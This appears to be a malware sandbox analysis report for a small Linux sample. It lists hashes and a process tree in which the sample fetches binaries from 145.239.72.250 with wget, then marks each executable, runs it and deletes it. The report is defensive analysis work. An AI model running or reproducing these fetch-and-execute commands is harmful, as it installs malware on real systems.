Analysis
-
max time kernel
1s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
16-06-2024 23:47
Static task
static1
Behavioral task
behavioral1
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
Resource
debian9-mipsel-20240611-en
General
-
Target
b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
-
Size
1KB
-
MD5
b5d1b02949999a3eeb829840ff8d2fae
-
SHA1
56efab4c12d0c9fe4c50478e6fb1b07585ffea00
-
SHA256
e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
-
SHA512
570367f105e94b636aa6a1a60f249006a278275a36ccb7048bcb5b7301f8d32c4a17fe59f48dd79160a7f8decd6ae4c81739b87f51dd9960afce94a16733b71a
Malware Config
Signatures
Processes
Each entry reads: executable path | command line | process-tree level ⤵ | PID. The digit before ⤵ belongs to the tree column, not to the file name or URL (the quoted entry `wget "http://145.239.72.250/ "` shows it sits outside the command line), so the fetched paths are /ntpd, /sshd, and so on, and /apache2 carries a single trailing 2.

- /tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 | /tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 | 1 ⤵ | PID:1508
- /usr/bin/wget | wget http://145.239.72.250/ntpd | 2 ⤵ | PID:1509
- /bin/chmod | chmod +x ntpd | 2 ⤵ | PID:1517
- /tmp/ntpd | ./ntpd | 2 ⤵ | PID:1518
- /bin/rm | rm -rf ntpd | 2 ⤵ | PID:1519
- /usr/bin/wget | wget http://145.239.72.250/sshd | 2 ⤵ | PID:1520
- /bin/chmod | chmod +x sshd | 2 ⤵ | PID:1524
- /tmp/sshd | ./sshd | 2 ⤵ | PID:1525
- /bin/rm | rm -rf sshd | 2 ⤵ | PID:1526
- /usr/bin/wget | wget http://145.239.72.250/openssh | 2 ⤵ | PID:1527
- /bin/chmod | chmod +x openssh | 2 ⤵ | PID:1528
- /tmp/openssh | ./openssh | 2 ⤵ | PID:1532
- /bin/rm | rm -rf openssh | 2 ⤵ | PID:1533
- /usr/bin/wget | wget http://145.239.72.250/bash | 2 ⤵ | PID:1534
- /bin/chmod | chmod +x bash | 2 ⤵ | PID:1535
- /tmp/bash | ./bash | 2 ⤵ | PID:1539
- /bin/rm | rm -rf bash | 2 ⤵ | PID:1540
- /usr/bin/wget | wget http://145.239.72.250/tftp | 2 ⤵ | PID:1541
- /bin/chmod | chmod +x tftp | 2 ⤵ | PID:1542
- /tmp/tftp | ./tftp | 2 ⤵ | PID:1543
- /bin/rm | rm -rf tftp | 2 ⤵ | PID:1547
- /usr/bin/wget | wget http://145.239.72.250/wget | 2 ⤵ | PID:1548
- /bin/chmod | chmod +x wget | 2 ⤵ | PID:1552
- /tmp/wget | ./wget | 2 ⤵ | PID:1553
- /bin/rm | rm -rf wget | 2 ⤵ | PID:1554
- /usr/bin/wget | wget http://145.239.72.250/cron | 2 ⤵ | PID:1555
- /bin/chmod | chmod +x cron | 2 ⤵ | PID:1559
- /tmp/cron | ./cron | 2 ⤵ | PID:1560
- /bin/rm | rm -rf cron | 2 ⤵ | PID:1561
- /usr/bin/wget | wget http://145.239.72.250/ftp | 2 ⤵ | PID:1562
- /bin/chmod | chmod +x ftp | 2 ⤵ | PID:1566
- /tmp/ftp | ./ftp | 2 ⤵ | PID:1567
- /bin/rm | rm -rf ftp | 2 ⤵ | PID:1568
- /usr/bin/wget | wget http://145.239.72.250/pftp | 2 ⤵ | PID:1569
- /bin/chmod | chmod +x pftp | 2 ⤵ | PID:1570
- /tmp/pftp | ./pftp | 2 ⤵ | PID:1574
- /bin/rm | rm -rf pftp | 2 ⤵ | PID:1575
- /usr/bin/wget | wget http://145.239.72.250/sh | 2 ⤵ | PID:1576
- /bin/chmod | chmod +x sh | 2 ⤵ | PID:1577
- /tmp/sh | ./sh | 2 ⤵ | PID:1581
- /bin/rm | rm -rf sh | 2 ⤵ | PID:1582
- /usr/bin/wget | wget "http://145.239.72.250/ " | 2 ⤵ | PID:1583
- /bin/chmod | chmod +x " " | 2 ⤵ | PID:1584
- /tmp/ | "./ " | 2 ⤵ | PID:1585
- /bin/rm | rm -rf " " | 2 ⤵ | PID:1586
- /usr/bin/wget | wget http://145.239.72.250/apache2 | 2 ⤵ | PID:1590
- /bin/chmod | chmod +x apache2 | 2 ⤵ | PID:1591
- /tmp/apache2 | ./apache2 | 2 ⤵ | PID:1595
- /bin/rm | rm -rf apache2 | 2 ⤵ | PID:1596
- /usr/bin/wget | wget http://145.239.72.250/telnetd | 2 ⤵ | PID:1597
- /bin/chmod | chmod +x telnetd | 2 ⤵ | PID:1598
- /tmp/telnetd | ./telnetd | 2 ⤵ | PID:1599
- /bin/rm | rm -rf telnetd | 2 ⤵ | PID:1600